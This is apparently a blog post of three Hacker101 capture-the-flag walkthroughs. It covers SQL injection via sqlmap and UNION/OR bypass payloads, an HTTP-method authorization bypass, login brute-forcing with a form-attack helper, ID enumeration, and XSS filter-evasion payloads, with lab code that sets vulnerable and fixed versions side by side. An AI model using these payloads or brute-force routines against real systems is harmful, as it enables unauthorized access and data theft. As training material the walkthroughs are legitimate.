Categories
Capture the Flag & Red Teaming

Walkthrough – Hacker101 – Micro-CMS v2

This post is a writeup of Micro-CMS v2, a Hacker101 CTF web hacking challenge. The challenge is categorized as Moderate, has three flags and comes with seven hints:

Flag0

  1. Regular users can only see public pages
  2. Getting admin access might require a more perfect union
  3. Knowing the password is cool, but there are other approaches that might be easier

Flag1

  1. What actions could you perform as a regular user on the last level, which you can’t now?
  2. Just because request fails with one method doesn’t mean it will fail with a different method
  3. Different requests often have different required authorization

Flag2

  1. Credentials are secret, flags are secret. Coincidence?

Following the provided link leads directly to the main page.

Flag 0

The main page looks very similar to the main page of Micro-CMS v1. This time, however, we cannot simply use the edit functionality to retrieve pages: both edit and create require authentication.

Probing the username field of the login form with a MySQL control character (a single quote) produces a verbose SQL error. The username field is therefore vulnerable to SQL injection, and the error message leaks the structure of the query, which makes it possible to craft a precise injection.

Two approaches are possible from here. We will use sqlmap to retrieve information from the database, as in the previous writeup. The alternative is an authentication bypass: log in and analyse the CMS from the inside. The sqlmap command to find a working injection payload and dump the databases is:

sqlmap -u "http://[ip]/[id]/login" --data="username=1&password=2" --dump

sqlmap identifies several payloads that work for further exploitation.

Dumping the table pages yields the content of every page stored in the CMS. One of them, titled Private Page, contains the flag.

If the alternative path is followed, the authentication bypass gives admin access to the CMS. With admin access the page Private Page, which contains the flag, is reachable from within the CMS.
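The following is an added example, not code from the challenge or from this writeup. It models the authentication-bypass route in a constructed sqlite database under one assumption about the login handler's shape: the username is formatted into the query and the stored password is compared in application code (the hint about a "more perfect union" points this way, but the real handler is not shown on the page). Under that shape the classic OR-based bypass fails, because the application still compares the real stored password with ours, while a UNION row lets us put a password of our own choosing into the result set. The parameterised variant shows the fix.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge database; the real schema
# and credentials are not shown on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 'correct-horse')")
    return db

def login_vulnerable(db, username, password):
    """Assumed shape of the vulnerable login: the username is formatted into
    the query, the stored password is compared in application code."""
    query = "SELECT password FROM admins WHERE username = '%s'" % username
    row = db.execute(query).fetchone()
    return row is not None and row[0] == password

def login_fixed(db, username, password):
    """Parameterised query: the username can no longer change the statement."""
    row = db.execute("SELECT password FROM admins WHERE username = ?",
                     (username,)).fetchone()
    return row is not None and row[0] == password

# Two classic bypass payloads. The OR-based one matches the real admin row,
# but the application then compares the *real* stored password with ours, so
# it fails. The UNION row returns a password we chose, so the comparison passes.
OR_PAYLOAD = "' OR 1=1 -- "
UNION_PAYLOAD = "' UNION SELECT 'chosen' -- "

def try_bypasses(db, login=login_vulnerable):
    """Submit both payloads as the username with 'chosen' as the password."""
    return {
        "or": login(db, OR_PAYLOAD, "chosen"),
        "union": login(db, UNION_PAYLOAD, "chosen"),
    }
```

The trailing space after `--` matters for MySQL, where the comment marker must be followed by whitespace; sqlite is more lenient, but the payload is written so it works on both.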

Flag 1

Using the edit function requires a valid login: if the edit page is requested with GET, the response is a redirect to the login page.

Changing the request method to POST circumvents the access check, and the response contains the flag. The authorization check is evidently applied to the GET handler only; every method a route accepts needs its own check.
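Added example (not the challenge's code): a minimal routing table that reproduces the behaviour observed above, with the login check applied to the GET handler only, next to the fixed table where both handlers are guarded. The page content and the decorator-based check are assumptions; `method_matrix` is the quick per-endpoint check a tester runs before trusting any redirect to the login page.

```python
from functools import wraps

# Constructed sample page store; the challenge's real content is not reproduced.
PAGES = {2: "private page body"}

def require_login(handler):
    """Authorization wrapper. In the vulnerable routing table it is applied to
    only one of the two methods, which is the bug the writeup exploits."""
    @wraps(handler)
    def guarded(page_id, session):
        if not session.get("user"):
            return 302, "/login"
        return handler(page_id, session)
    return guarded

def edit_get(page_id, session):
    """Render the edit form, pre-filled with the current page body."""
    return 200, PAGES[page_id]

def edit_post(page_id, session):
    """Handle the form submit; it re-renders the body, so it leaks it too."""
    return 200, PAGES[page_id]

VULNERABLE_ROUTES = {"GET": require_login(edit_get), "POST": edit_post}
FIXED_ROUTES = {"GET": require_login(edit_get), "POST": require_login(edit_post)}

def dispatch(routes, method, page_id, session=None):
    """Route a request; returns (status, body)."""
    handler = routes.get(method)
    if handler is None:
        return 405, ""
    return handler(page_id, session or {})

def method_matrix(routes, page_id, methods=("GET", "POST", "PUT", "DELETE")):
    """The check a tester runs on every protected endpoint: same URL, no
    session, each method in turn. Any method that answers with something other
    than 302/401/403/405 deserves a closer look."""
    return {m: dispatch(routes, m, page_id)[0] for m in methods}
```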

Flag 2

Since sqlmap already gave us access to the database, we can retrieve every table in it. A second table, admins, contains valid cleartext credentials for the login form.

Logging in with these credentials yields the last flag.

If the alternative approach was followed, no credentials are available for the login. In that case the flag can be obtained by brute-forcing the login form with hydra, medusa or Burp Suite Intruder (sniper attack). Solid wordlists for such attacks can be found in the jeanphorn and SecLists repositories and under /usr/share/wordlists/ on any Kali installation.
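Added example, not part of the writeup: the logic behind the brute-force step, written out so that the same loop can be pointed at a real form or at an offline stand-in. `http_form_attempt` follows the same rule as hydra's `http-post-form` failure string (absence of the "login failed" text counts as success); it is not executed here. The credentials and wordlist excerpt are constructed.

```python
import urllib.error
import urllib.parse
import urllib.request

def brute_force(attempt, usernames, passwords, max_attempts=None):
    """Try every username/password pair in order. Returns (user, password,
    tries) for the first pair that attempt() accepts, or None. attempt() must
    return True only on a successful login, or results are meaningless."""
    tries = 0
    for user in usernames:
        for pw in passwords:
            if max_attempts is not None and tries >= max_attempts:
                return None
            tries += 1
            if attempt(user, pw):
                return user, pw, tries
    return None

def http_form_attempt(url, user, pw, fail_marker,
                      user_field="username", pw_field="password"):
    """Attempt function for a real login form: POST the fields and treat the
    absence of the failure text as success. Shown for completeness only."""
    data = urllib.parse.urlencode({user_field: user, pw_field: pw}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        body = exc.read().decode("utf-8", "replace")
    return fail_marker not in body

# Constructed stand-in for the login form so the example runs offline.
_FAKE_ADMINS = {"admin": "winter2019"}

def fake_attempt(user, pw):
    return _FAKE_ADMINS.get(user) == pw

# Constructed wordlist excerpt; a real run would read SecLists or similar.
WORDLIST = ["123456", "password", "admin", "letmein", "winter2019"]
```

Pick the failure marker from a known-bad login first, and watch for lockouts and rate limiting: a form that starts answering every attempt with the same error page will look like one that accepts everything.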


Walkthrough – Hacker101 – Micro-CMS v1

This post is a writeup of Micro-CMS v1, a Hacker101 CTF web hacking challenge. The challenge is categorized as Easy, has four flags and comes with twelve hints:

Flag0

  1. Try creating a new page
  2. How are pages indexed?
  3. Look at the sequence of IDs
  4. If the front door doesn’t open, try the window
  5. In what ways can you retrieve page contents?

Flag1

  1. Make sure you tamper with every input
  2. Have you tested for the usual culprits? XSS, SQL injection, path injection
  3. Bugs often occur when an input should always be one type and turns out to be another
  4. Remember, form submissions aren’t the only inputs that come from browsers

Flag2

  1. Sometimes a given input will affect more than one page
  2. The bug you are looking for doesn’t exist in the most obvious place this input is shown

Flag3

  1. Script tags are great, but what other options do you have?

Following the provided link leads directly to the main page.

Flag 0

As can be seen, there are two sample pages (Testing and Markdown Test) as well as a link to create a new page. As a first step, the samples are reviewed.

There is not much information on the first sample page; however, there is an edit function for existing pages. We keep this in mind and explore the second sample page.

The second page does not provide much information either. An interesting observation at this point is that pages are accessed via the following URL scheme:

http://[ip]/[id]/page/[number]

So far the observed page numbers are 1 and 2. To investigate the numbering scheme further, a new page is created.

Accessing the page reveals the assigned number.

Interestingly, the new page is assigned number 10, while the two sample pages are numbered 1 and 2. Enumerating the missing IDs between 2 and 10 reveals that all but one do not exist on the server; page number 5, however, responds with 403 Forbidden.

As we have already discovered the edit function, we quickly identify the syntax to edit a page as:

http://[ip]/[id]/page/edit/[number]

and try to access page 5 via the edit function.

Fortunately, the edit function displays the content of the page being edited without enforcing the access restriction. This way the first flag is retrieved.

Flag 1

From our observations we already know that the number in the URL is used to read the stored page from the server. A common initial test for SQL injection is to append control characters to the parameter. Since these characters vary between database management systems, some trial and error is required without further information; sqlmap is an excellent tool to automate this.

However, as an initial probe, we append the MySQL string delimiter ' to the two URLs identified so far:

http://[ip]/[id]/page/[number]'
http://[ip]/[id]/page/edit/[number]'

The second request yields the flag, indicating that the edit function is not only vulnerable to the access-control bypass used above but also to SQL injection.
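Added example covering both Flag 0 and Flag 1 above; it is not the challenge's code. A constructed sqlite page store reproduces the observed ID layout (1, 2 and 10 exist, 5 is forbidden), and the two routes are given the shapes that would explain the observations: the view route binds the id as a parameter and checks visibility, while the edit route formats the id into the query and skips the visibility check. Both of those shapes are assumptions about the challenge. `enumerate_ids` is the ID sweep and `quote_probe` is the single-quote test from the two URLs above; `edit_page_fixed` removes both defects.

```python
import sqlite3

def make_cms():
    """Constructed stand-in for the page store: IDs 1, 2 and the newly
    created 10 are public, 5 is the forbidden page, all other IDs are absent."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, "
               "body TEXT, public INTEGER)")
    db.executemany("INSERT INTO pages VALUES (?, ?, ?, ?)", [
        (1, "Testing", "testing body", 1),
        (2, "Markdown Test", "markdown body", 1),
        (5, "Private", "private body", 0),
        (10, "New page", "new body", 1),
    ])
    return db

def view_page(db, page_id):
    """/page/<id>: bound parameter plus a visibility check."""
    row = db.execute("SELECT body, public FROM pages WHERE id = ?",
                     (page_id,)).fetchone()
    if row is None:
        return 404, ""
    if not row[1]:
        return 403, ""
    return 200, row[0]

def edit_page(db, page_id):
    """/page/edit/<id>, assumed vulnerable shape: the id is formatted straight
    into the SQL and the visibility check is missing. Two bugs, one route."""
    row = db.execute("SELECT body FROM pages WHERE id = %s" % page_id).fetchone()
    if row is None:
        return 404, ""
    return 200, row[0]

def edit_page_fixed(db, page_id, session):
    """Same route with both defects removed: integer coercion plus a bound
    parameter, and the same authorisation rule the view route applies."""
    try:
        page_id = int(page_id)
    except (TypeError, ValueError):
        return 404, ""
    row = db.execute("SELECT body, public FROM pages WHERE id = ?",
                     (page_id,)).fetchone()
    if row is None:
        return 404, ""
    if not row[1] and not session.get("user"):
        return 403, ""
    return 200, row[0]

def enumerate_ids(db, handler, ids):
    """IDOR sweep: status code per id, the first thing to do after noticing
    that a freshly created page got id 10."""
    return {i: handler(db, i)[0] for i in ids}

def quote_probe(db, handler, page_id):
    """Append a single quote to the id. A database error means the value
    reaches the SQL engine unescaped; None means the route coped."""
    try:
        handler(db, "%s'" % page_id)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None
```

The sweep is what turns a 403 into a lead: any id that exists but is refused on one route is worth retrying on every other route that takes the same id.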

Flag 2 and 3

Next we analyse the input submitted via HTTP form data. The create-new-page function has two potential vectors for injecting malicious content: the title and the body.

An initial probe for XSS with the following payload in the body field is sent:

<IMG SRC=javascript:alert('XSS')>

The result shows that the word script is replaced with scrubbed in an attempt to filter out JavaScript.

This filter can be evaded with a payload that does not contain the word script. The OWASP XSS Filter Evasion Cheat Sheet provides a good collection of such payloads.

The following payload is chosen for further investigation:

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,88))"></img>

To speed up the analysis, the payload is injected into both fields at the same time. Viewing the source of the edited page after injection yields the first flag.

The second XSS flag is retrieved via the main page, where the title of each page is listed.
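Added example (not the challenge's code) for the two XSS flags above. The filter is reconstructed from the observed behaviour only: every occurrence of "script" becomes "scrubbed", which is an assumption about its exact form. The two payloads are the ones used in the writeup; the listing markup and the detector are constructed. It shows why the event-handler payload survives a denylist, and that the fix for a title rendered into an HTML text node is escaping, not filtering.

```python
import html
import re

def scrub(text):
    """Assumed filter, reconstructed from the observed behaviour: every
    occurrence of 'script' is replaced with 'scrubbed'. A denylist, so it
    only knows the one trick it was written for."""
    return re.sub(r"script", "scrubbed", text, flags=re.IGNORECASE)

# The two payloads used in the writeup.
PAYLOAD_SCRIPT = "<IMG SRC=javascript:alert('XSS')>"
PAYLOAD_EVENT = '<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,88))"></img>'

def render_listing_vulnerable(title):
    """Main-page listing entry (constructed markup); the title passes through
    the denylist only, so anything without the word 'script' lands in the
    page as live markup."""
    return '<li><a href="/page/10">%s</a></li>' % scrub(title)

def render_listing_fixed(title):
    """Context-appropriate fix for an HTML text node: escape, do not filter."""
    return '<li><a href="/page/10">%s</a></li>' % html.escape(title, quote=True)

_EVENT_HANDLER = re.compile(r"<\w+[^>]*\son\w+\s*=", re.IGNORECASE)

def has_live_event_handler(rendered_html):
    """Crude detector: an element tag that still carries an on*= attribute."""
    return _EVENT_HANDLER.search(rendered_html) is not None
```

The body field is a different context: it is rendered as Markdown, so blanket escaping would break legitimate formatting. There the usual answer is an allowlist-based HTML sanitizer applied to the rendered output, not a denylist on the input.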


Walkthrough – Hacker101 – A little something to get you started

This post is a writeup of A little something to get you started, a Hacker101 CTF web hacking challenge. The challenge is categorized as Trivial, has one flag and comes with four hints:

  1. Take a look at the source for the page
  2. Does anything seem out of the ordinary?
  3. The page looks really plain
  4. What is that image?

Following the provided link leads directly to the main page.

Flag 0

As there is not much information on the rendered page, a good next step is to check the page source for additional information.

The source reveals an image (background.png) set as the background image. Requesting this image directly yields the flag.